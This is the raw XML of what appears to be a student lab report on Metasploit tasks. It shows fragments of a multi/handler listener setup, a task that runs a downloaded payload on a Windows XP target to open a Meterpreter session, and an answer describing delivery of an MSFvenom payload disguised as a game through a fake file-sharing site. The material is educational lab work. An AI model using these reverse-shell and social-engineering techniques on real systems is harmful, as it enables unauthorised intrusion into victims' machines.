      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7A5C13" w14:textId="568DA7CD" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Here </w:t>
      </w:r>
      <w:r w:rsidR="00334CCC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the list of commands I used to do what is described in task 11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B69C3" w14:textId="3B254936" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2546A01D"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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21792C03"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409A40C3"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78B3523A"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LPORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12666FA9"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LPORT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4449</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED67225"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03E5E7C9"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25F9C4B1"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79FB7664"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9CE18" w14:textId="7029BFAC"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color w:val="006666"/>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0CAB287E"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p>
    <w:p w14:paraId="41835FA4" w14:textId="10643AA0" w:rsidR="002232F4" w:rsidRPr="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F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207681B3" w14:textId="7A397F69" w:rsidR="002232F4" w:rsidRDefault="00182CA4" w:rsidP="00182CA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc20508512"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 12:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0AD9CDD1" w14:textId="688863CB" w:rsidR="00182CA4" w:rsidRDefault="00182CA4" w:rsidP="00182CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182CA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Visit the attacker’s IP from the target machine (Windows XP) and download the malicious payload. Run it and confirm that a Meterpreter session is opened. Report a relevant screenshot of the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369553C" w14:textId="0AF7CD9F" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00182CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F97F2AD" w14:textId="4E4D2129" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00182CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">After downloading and running the malicious payload on the target system, the Metasploit session using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> module started a Meterpreter session on the machine that executed the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24416A" w14:textId="18EE64BD" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00182CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAAF778"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5CE4A81C"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B121B34"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10AA7C5A"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77712FBB" w14:textId="01FCD534"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w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>101</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09</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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00834D24">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0700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C410B20"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76549D91" w14:textId="51889673"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645E4E91" w14:textId="313D9A5C" w:rsidR="00365288" w:rsidRPr="00365288" w:rsidRDefault="003C3921" w:rsidP="00365288">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rP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60F224EC" wp14:editId="7F963A84">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3002585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>237515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4139627" cy="2591983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21436"/>
                <wp:lineTo x="21471" y="21436"/>
                <wp:lineTo x="2147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9627" cy="25919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58240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="457ED4B7" wp14:editId="4526472B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>14630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3313786" cy="2482332"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21384"/>
                <wp:lineTo x="21484" y="21384"/>
                <wp:lineTo x="2148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3786" cy="2482332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here are some relevant screenshots on what happened after the payload was executed in the target system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B695A" w14:textId="06FCCAD1" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00365288">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc20508513"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 13:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="4DCAB332" w14:textId="45E7A5EB" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00365288">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00365288">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Why would one use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00365288">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00365288">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of Metasploit? Elaborate please and explain one example scenario to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF00894" w14:textId="23578886" w:rsidR="00365288" w:rsidRDefault="00365288" w:rsidP="00365288">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3190C721" w14:textId="28AE8C0E" w:rsidR="00365288" w:rsidRPr="003C3921" w:rsidRDefault="003C3921" w:rsidP="00443CF8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I think one of the reasons why </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be used instead of Metasploit is because the target system doesn’t necessarily have to have a vulnerability to exploit to get a Meterpreter session. An end user just needs to run the payload on the target system to obtain a Meterpreter session. This is quite useful in situations such as social engineering. Meaning that a penetration tester could potentially persuade an end user to run the payload on the target system. For example, a penetration tester could pretend that they have developed a game and persuades an end user to try their game. The pen tester sets a phony file sharing website that downloads a payload disguised as a game. When the end user gets the “game” they execute the payload and the pen tester has now </w:t>
      </w:r>
      <w:r w:rsidR="00443CF8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>gained access to their system.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00365288" w:rsidRPr="003C3921" w:rsidSect="00834D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1B4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="226CCB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041B06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E66773C"/>
    <w:lvl w:ilvl="0" w:tplc="F08E0762">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Georg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82"/>
    <w:rsid w:val="00114AC1"/>
    <w:rsid w:val="001256FF"/>
    <w:rsid w:val="00182CA4"/>
    <w:rsid w:val="002232F4"/>
    <w:rsid w:val="00232DF4"/>
    <w:rsid w:val="00334CCC"/>
    <w:rsid w:val="00365288"/>
    <w:rsid w:val="003C3921"/>
    <w:rsid w:val="00443CF8"/>
    <w:rsid w:val="00562759"/>
    <w:rsid w:val="005E1C0D"/>
    <w:rsid w:val="00610FFF"/>
    <w:rsid w:val="00665469"/>
    <w:rsid w:val="00733AF0"/>
    <w:rsid w:val="007C2510"/>
    <w:rsid w:val="00830C65"/>
    <w:rsid w:val="00834D24"/>
    <w:rsid w:val="00851FE4"/>
    <w:rsid w:val="00886482"/>
    <w:rsid w:val="008B560C"/>
    <w:rsid w:val="00911154"/>
    <w:rsid w:val="00941781"/>
    <w:rsid w:val="00A511F7"/>
    <w:rsid w:val="00A83F58"/>
    <w:rsid w:val="00BE149A"/>
    <w:rsid w:val="00C37643"/>
    <w:rsid w:val="00C45AEC"/>
    <w:rsid w:val="00D23AAD"/>
    <w:rsid w:val="00D84791"/>
    <w:rsid w:val="00E00993"/>
    <w:rsid w:val="00E114B7"/>
    <w:rsid w:val="00E26171"/>
    <w:rsid w:val="00E56474"/>
    <w:rsid w:val="00E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BEDC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8573C3EF-4CEA-4880-BCD0-40428130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482"/>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33AF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33AF0"/>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8648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648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479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84791"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D8479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8479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F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33AF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864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6482"/>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locked/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00886482"/>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886482"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E857AB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00886482"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00886482"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00886482"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE149A"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002232F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002232F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002232F4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D847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84791"/>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rsid w:val="00D847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847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997">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1649358325">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="26412950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="43258640">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="183323484">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1369835267">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="190845372">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1088306687">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="201212146">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="392847971">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="219286332">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
